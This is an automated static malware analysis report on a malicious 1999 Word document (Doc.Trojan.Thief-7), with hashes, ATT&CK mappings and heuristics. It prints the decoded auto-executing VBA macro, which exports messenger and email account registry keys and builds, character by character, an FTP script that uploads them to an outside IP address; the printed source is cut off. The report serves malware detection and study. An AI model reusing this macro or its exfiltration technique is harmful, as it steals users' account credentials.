Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f33a17a92f39e689…

MALICIOUS

Office (OLE)

Size: 47.0 KB
Created: 1999-08-08 03:28:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ccbf1dd76ca39706dcba7f5dd304b425
SHA-1: 3160e3933d1ce0b52d7deacc71feddb5b261cffb
SHA-256: f33a17a92f39e689129e913193cffd181a73820ee626b45649e900dc182437f4
Risk Score: 280

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes automatically when the document is opened. This macro attempts to export sensitive user information from the registry, including AOL Instant Messenger and Microsoft Internet Account Manager details, to temporary files. The presence of the 'Shell()' call and the auto-execution of the 'Document_Open' macro strongly indicate a malicious intent to exfiltrate user data.

Heuristics (5)

  • ClamAV: Doc.Trojan.Thief-7 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Thief-7
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6567 bytes
SHA-256: 48cd9603c348108d1ec935ae7bd5c26217bd0134cbc288d373146ef74dcd238e
Detection
ClamAV: Doc.Trojan.Thief-7
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
'HAHAHAHA If you have found this... Greetz out to alt.hackers.malicious
' all those guys who think they no everything about everyone jsut from a posting
'  Well, maybe this will teach them a thing or two
'  Love anonymous

Dim commandx As String
Dim commandy As String
Dim commandz As String

Dim mychar As String
Dim fnamez As String
Dim fnamezz As String
Dim info1 As String
Dim info2 As String
Dim info3 As String
Dim info4 As String
Dim info5 As String
Dim info6 As String
Dim info7 As String

info1 = Application.UserAddress
info2 = Application.UserName
info3 = Application.UserInitials




fnamez = Second(VBA.DateTime.Now)
'Application.UserAddress



mychar = Chr$(34)

 Dim var1(4) As String
     Dim var2(13) As String
     Dim var3(9) As String
     Dim var4(3) As String
     Dim var5(3) As String
     Dim var6(6) As String
     Dim var7(7) As String
     Dim var8(10) As String
     Dim var9(4) As String
     Dim var10(11) As String
     Dim carriage(2) As String
     Dim Location As Integer
     Dim errorp

commandx = "regedit /e c:\" & fnamez & "reg1.reg " & mychar & "HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users" & mychar



commandy = "regedit /e c:\" & fnamez & "reg2.reg " & mychar & "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info" & mychar

commandz = "regedit /e c:\" & fnamez & "reg3.reg " & mychar & "HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts" & mychar

fnamezz = "c:\" & fnamez & "reg4.reg"




Dim RetVal
RetVal = Shell(commandx, 0)    ' Run Calculator.
RetVal = Shell(commandy, 0)
RetVal = Shell(commandz, 0)
     
     carriage(1) = Chr$(13)
     carriage(2) = Chr$(10)
     Location = 0
     var1(1) = "o"
     var1(2) = "p"
     var1(3) = "e"
     var1(4) = "n"
     
     var2(1) = "1"
     var2(2) = "9"
     var2(3) = "5"
     var2(4) = "."
     var2(5) = "4"
     var2(6) = "7"
     var2(7) = "."
     var2(8) = "2"
     var2(9) = "1"
     var2(10) = "."
     var2(11) = "1"
     var2(12) = "3"
     var2(13) = "2"
     
     
     var3(1) = "a"
     var3(2) = "n"
     var3(3) = "o"
     var3(4) = "n"
     var3(5) = "y"
     var3(6) = "m"
     var3(7) = "o"
     var3(8) = "u"
     var3(9) = "s"
     
     var4(1) = "z"
     var4(2) = "@"
     var4(3) = "z"
     
     var5(1) = "a"
     var5(2) = "s"
     var5(3) = "c"
     
     var6(1) = "p"
     var6(2) = "r"
     var6(3) = "o"
     var6(4) = "m"
     var6(5) = "p"
     var6(6) = "t"
     
     var10(1) = "c"
     var10(2) = "d"
     var10(3) = " "
     var10(4) = "I"
     var10(5) = "n"
     var10(6) = "c"
     var10(7) = "o"
     var10(8) = "m"
     var10(9) = "i"
     var10(10) = "n"
     var10(11) = "g"
     
     var7(1) = "l"
     var7(2) = "c"
     var7(3) = "d"
     var7(4) = " "
     var7(5) = "c"
     var7(6) = ":"
     var7(7) = "\"
     
     
     var8(1) = "m"
     var8(2) = "p"
     var8(3) = "u"
     var8(4) = "t"
     var8(5) = " "
     var8(6) = "*"
     var8(7) = "."
     var8(8) = "r"
     var8(9) = "e"
     var8(10) = "g"
     
     var9(1) = "q"
     var9(2) = "u"
     var9(3) = "i"
     var9(4) = "t"
     
     Open fnamezz For Random As 5
     Put #5, 1, info1
     Put #5, 2, info2
     Put #5, 3, info3
     Close 5
     
     
     
     
     Open "c:\list4.txt" For Binary As 4
     
     For i = 1 To 4 'open
          Location = Location + 1
          Put #4, Location, var1(i)
     Next
     Location = Location + 1
     Put #4, Location, var7(4)
     
     For i = 1 To 13 'ipaddy
          Location = Location + 1
          Put #4, Location, var2(i)
     Next
     Location = Location + 1
  
... (truncated)